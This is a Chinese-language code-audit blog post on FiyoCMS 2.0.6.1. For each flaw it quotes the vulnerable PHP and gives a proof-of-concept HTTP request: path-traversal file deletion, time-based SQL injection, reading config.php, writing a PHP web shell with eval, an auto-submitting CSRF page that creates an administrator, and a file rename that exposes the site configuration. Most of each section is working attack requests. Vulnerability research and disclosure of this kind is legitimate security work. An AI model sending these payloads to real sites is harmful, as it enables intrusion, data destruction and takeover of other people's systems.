fiyocms_2.0.6.1代码审计

全局分析

漏洞分析

任意文件删除

位置

/dapur/apps/app_config/controller/backuper.php 第16-30行

分析

if(isset($_POST['type'])) {		
	if($_POST['type'] == 'database') {		
		@unlink("../../../../.backup/$_POST[file]");		
		if(!file_exists('../../../../.backup'))
			mkdir('../../../../.backup');			
		$date = md5(date("Ymd:His"));
		$file = "db-backup-$date";
		$c = backup_tables("*",'../../../../.backup',"$file",true);
		if($c) 		{
			$size = format_size(filesize("../../../../.backup/$file.sql"));
			$time = date("Y/m/d H:i:s",filemtime("../../../../.backup/$file.sql"));	
			$r = "$size - $time";
			echo "{ \"file\":\"$file.sql\" , \"info\":\"$r\" }";
			
		}
	}

通过POST传递的参数file没有经过任何处理就拼接进unlink函数进行文件删除操作

复现

在网站根目录下建立flag.php文件
payload如下:

POST /dapur/apps/app_config/controller/backuper.php HTTP/1.1
Host: cms.cn
Content-Length: 27
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://cms.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://cms.cn/dapur/apps/app_config/controller/backuper.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=m0a7osbhddgpdq575hla480914
Connection: close

type=database&file=../flag.php

第一次发送payload,没有.backup文件夹,会新建,第二次发送,flag.php已经成功删除

SQL注入漏洞

位置

/system/database.php第210-233行

分析

    public function update($table,$rows,$where)
    {
        $update = 'UPDATE '.$table.' SET ';
        $keys = array_keys($rows);
		
        for($i = 0; $i < count($rows); $i++){
            if(is_string($rows[$keys[$i]]) AND $rows[$keys[$i]] !== '+hits')
            {
                $update .= $keys[$i].'="'.$rows[$keys[$i]].'"';
            }
            else
            {
				if($rows[$keys[$i]] == '+hits') $rows[$keys[$i]] = $keys[$i] . '+'. 1;
                 $update .= $keys[$i].'='.$rows[$keys[$i]];
            }

            // Parse to add commas
            if($i != count($rows)-1)
            {
                $update .= ',';
            }
        }
			
        $update .= ' WHERE '.$where;			
		static $cons = false;
		try{
			$result = $this->connect();       
			$result = $this->db->prepare($update);
			$query = $result ->execute();
        }

可以看到这里update语句中的where条件是通过直接拼接参数$where而成的,猜测可能通过$where参数构成sql注入,我们随便找一个带有update方法的实例,如/dapur/apps/app_user/controller/status.php

if(isset($_GET['stat'])) {
	if($_GET['stat']=='1'){
		$db->update(FDBPrefix.'user',array("status"=>"1"),'id='.$_GET['id']);
		alert('success',Status_Applied,1);
	}

复现

payload如下:

GET /dapur/apps/app_user/controller/status.php?stat=1&id=1%20and%20if(ascii(substr(database(),1,1))=102,sleep(5),1) HTTP/1.1
Host: cms.cn
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=m0a7osbhddgpdq575hla480914
Connection: close

成功造成延时注入,delete方法也同样存在这个问题

文件读取漏洞

位置

/dapur/apps/app_theme/libs/check_file.php 第13-26行

分析

$file = $url= "$_GET[src]/$_GET[name]"; 
$furl = "../../../$url";

$content = strlen("$file") - 5;
$content = substr("$file",$content);

$file = strpos("$content",".");
$file = substr("$content",$file+1);


if($file == "html" || $file == "htm" || $file == "xhtml" || $file == "js" ||
$file == "jsp" || $file == "php" || $file == "css" || $file == "xml" ) :
	$content = @file_get_contents($furl);
	$content = htmlentities($content);

通过file_get_contents函数对$furl参数的值进行文件读取,而$furl参数是由GET方式传入的参数src和name拼接而成,且文件读取的对象后缀需要是指定文件后缀,$file的值即目标文件的后缀名。这就构成了任意文件读取漏洞

复现

payload如下:

GET /dapur/apps/app_theme/libs/check_file.php?src=..&name=config.php HTTP/1.1
Host: cms.cn
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=74cpjhhrkrssoo4e2p55jrtns7
Connection: close

读取网站根目录下的config.php文件

文件上传漏洞

位置

/dapur/apps/app_theme/libs/save_file.php 第23-27行

分析

$c = $_POST["content"];
$f = $_POST["src"]; 

$w = file_put_contents($f,$c);

没有过滤参数就拼接在file_put_contents函数中,构成文件上传漏洞

复现

payload如下:

POST /dapur/apps/app_theme/libs/save_file.php HTTP/1.1
Host: cms.cn
Content-Length: 97
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://cms.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://cms.cn/dapur/apps/app_theme/libs/save_file.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=74cpjhhrkrssoo4e2p55jrtns7
Connection: close

content=<?php eval($_POST['shell']); ?>&src=../../../../shell.php

CSRF漏洞

位置

/dapur/apps/app_user/sys_user.php 第110-123行

分析

if(isset($_POST['save']) or isset($_POST['apply'])){
	$us=strlen("$_POST[user]");
	$ps=strlen("$_POST[password]");
	$user = $_POST['user'];
	$name = $_POST['name'];
	preg_match('/[^a-zA-Z0-9]+/', $user, $matches);
	if(!empty($_POST['password']) AND 
		!empty($_POST['user'])AND 
		!empty($_POST['name'])AND 
		!empty($_POST['email'])AND 
		!empty($_POST['level'])AND 
		$_POST['password']==$_POST['kpassword'] AND 
		$us>2 AND $ps>3 AND @ereg("^.+@.+\\..+$",$_POST['email']) AND !$matches) {
		$qr=$db->insert(FDBPrefix.'user',array("","$user","$name",MD5("$_POST[password]"),"$_POST[email]","$_POST[status]","$_POST[level]",date('Y-m-d H:i:s'),'',"$_POST[bio]"));

没有加入token验证,所以可以造成CSRF攻击,可以添加超级用户

复现

抓取添加用户的包

POST /dapur/?app=user&act=add HTTP/1.1
Host: cms.cn
Content-Length: 138
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://cms.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://cms.cn/dapur/?app=user&act=add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6st43dvq664h8i9es4mlfevdi3
Connection: close

apply=Next&id=&z=&user=test555&z=&x=&password=123456&kpassword=123456&email=test555%40qq.com&level=1&name=test555&status=1&bio=test555

构造好的用于建立超级用户的网页代码如下:

<html>
  <body>
    <form name="csrf" action="http://cms.cn/dapur/?app=user&act=add" method="POST">
      <input type="hidden" name="apply" value="Next" />
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="z" value="" />
      <input type="hidden" name="user" value="test555" />
      <input type="hidden" name="z" value="" />
      <input type="hidden" name="x" value="" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="kpassword" value="123456" />
      <input type="hidden" name="email" value="test555&#64;qq&#46;com" />
      <input type="hidden" name="level" value="1" />
      <input type="hidden" name="name" value="test555" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="bio" value="test555" />
      <input type="submit" value="Submit request" />
    </form>
	 <script type="text/javascript">
        document.csrf.submit();
 </script>
  </body>
</html>

用户访问 test.html,就会立即生成test555的超级用户

任意文件修改漏洞

位置

/dapur/apps/app_config/sys_config.php 第190-193行

分析

		$new_folder = $_POST['folder_new'];
		$old_folder = $_POST['folder_old'];
		if($old_folder != $new_folder) {
			$ok = @rename("../$old_folder","../$new_folder");

对POST传递的参数$folder_new$folder_old未进行过滤拼接至@rename函数进行文件名修改操作

复现

payload如下:

POST /dapur/?app=config HTTP/1.1
Host: cms.cn
Content-Length: 147
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://cms.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://cms.cn/dapur/?app=config
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6st43dvq664h8i9es4mlfevdi3
Connection: close

folder_new=config.txt&folder_old=config.php&config_save=1&site_name=1&site_title=1&site_url=1&site_status=1&site_title=1&file_allowed=1&file_size=1

将网站根目录config.php文件修改成config.txt文件,然后直接访问该文件即可查看

posted @ 2021-08-15 19:28  AtSunset  阅读(129)  评论(0)    收藏  举报